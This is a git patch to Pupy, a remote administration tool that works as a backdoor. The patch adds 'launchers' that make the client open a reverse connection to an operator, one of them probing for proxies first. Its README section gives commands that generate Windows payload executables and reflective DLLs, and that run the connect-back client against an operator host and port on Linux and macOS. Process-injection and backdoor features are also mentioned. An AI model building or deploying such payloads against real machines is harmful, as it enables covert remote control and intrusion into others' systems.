From b24199df2c7d3c176d3f8e6fd9b274d5627ec06b Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Mon, 23 Nov 2015 18:47:48 +0100 Subject: [PATCH] windows payloads now works with launchers --- README.md | 41 ++++++++++++++++++++++++-------------- client/sources/main_exe.c | 3 --- pupy/pupygen.py | 2 ++ pupy/pupylib/PupyServer.py | 3 ++- 4 files changed, 30 insertions(+), 19 deletions(-) diff --git a/README.md b/README.md index 3f8b088d..0fa032af 100644 --- a/README.md +++ b/README.md @@ -29,6 +29,13 @@ Pupy is an opensource, multi-platform Remote Administration Tool with an embedde - scramblesuit - [A Polymorphic Network Protocol to Circumvent Censorship](http://www.cs.kau.se/philwint/scramblesuit/) +## Implemented Launchers : +Launchers allow pupy to run custom actions before starting the reverse connection +- simple + - Just connect back +- auto_proxy + - Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retriaval methods are : registry, WPAD requests, gnome settings, HTTP_PROXY env variable + ## Implemented Modules : - migrate - inter process architecture injection also works (x86->x64 and x64->x86) @@ -66,28 +73,32 @@ In these examples the server is running on a linux host (tested on kali linux) a The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5) #### for Windows ```bash -./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe +$ ./pupygen.py auto_proxy -h +usage: auto_proxy [-h] --host + [--transport {obfs3,tcp_cleartext,tcp_ssl,tcp_base64,scramblesuit}] + ... +$ ./pupygen.py -t exe_x86 auto_proxy --transport tcp_ssl --host 192.168.2.132:443 +binary generated with config : +OUTPUT_PATH = ~/pupy/pupyx86.exe +LAUNCHER = 'auto_proxy' +LAUNCHER_ARGS = ['--transport', 'tcp_ssl', '--host', '192.168.2.132:443'] +OFFLINE_SCRIPT = None + + ``` you can also : +- use another launcher (currently simple or auto_proxy) - use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means. - customize the transport used by supplying it with --transport -#### for Linux +#### for Linux & Mac OS X ```bash pip install rpyc #(or manually copy it if you are not admin) -python pp.py 192.168.0.1:443 +python pp.py simple --transport tcp_ssl --host 127.0.0.2:443 ``` -you can also build a single binary with pyinstaller : -```bash -pyinstaller --onefile /full_path/pupy/pupy/pp.py -``` - -#### for MAC OS X -```bash -easy_install rpyc #(or manually copy it if you are not admin) -python pp.py 192.168.0.1:443 -``` -you can also build a single binary with pyinstaller (but you can't "cross-compile", pyinstaller currently only support this from osx): +you can also : +- modify the default arguments at the top of the file to call pp.py without arguments +- build a single binary with pyinstaller : ```bash pyinstaller --onefile /full_path/pupy/pupy/pp.py ``` @@ -196,7 +207,7 @@ Some ideas without any priority order - [ ] split the README into the wiki - [ ] The backdoor factory ? - [ ] Impacket ? -- [ ] support for https proxy +- [X] support for https & socks proxy - [ ] HTTP transport - [ ] UDP transport - [ ] DNS transport diff --git a/client/sources/main_exe.c b/client/sources/main_exe.c index f5d797c3..970fbfcd 100644 --- a/client/sources/main_exe.c +++ b/client/sources/main_exe.c @@ -3,9 +3,6 @@ #include #include #include "pupy_load.h" -#ifndef DEBUG - #pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup") -#endif int main(int argc, char *argv[]){ return mainThread(NULL); diff --git a/pupy/pupygen.py b/pupy/pupygen.py index fb97928a..999647db 100755 --- a/pupy/pupygen.py +++ b/pupy/pupygen.py @@ -3,6 +3,7 @@ # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) # Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms +import logging import argparse import sys import os.path @@ -25,6 +26,7 @@ def get_edit_pupyx64_exe(conf): return get_edit_binary(os.path.join("payload_templates","pupyx64.exe"), conf) def get_edit_binary(path, conf): + logging.debug("generating binary %s with conf: %s"%(path, conf)) if not "offline_script" in conf: offline_script="" else: diff --git a/pupy/pupylib/PupyServer.py b/pupy/pupylib/PupyServer.py index 176b2845..21c1178d 100644 --- a/pupy/pupylib/PupyServer.py +++ b/pupy/pupylib/PupyServer.py @@ -24,6 +24,7 @@ from .PupyErrors import PupyModuleExit, PupyModuleError from .PupyJob import PupyJob from .PupyCmd import color_real from network.conf import transports +from pupylib.utils.rpyc_utils import obtain try: import ConfigParser as configparser @@ -142,7 +143,7 @@ class PupyServer(threading.Thread): "pid" : l[7], "address" : conn._conn._config['connid'].split(':')[0], "launcher" : conn.get_infos("launcher"), - "launcher_args" : conn.get_infos("launcher_args"), + "launcher_args" : obtain(conn.get_infos("launcher_args")), }, self)) if self.handler: addr = conn.modules['pupy'].get_connect_back_host()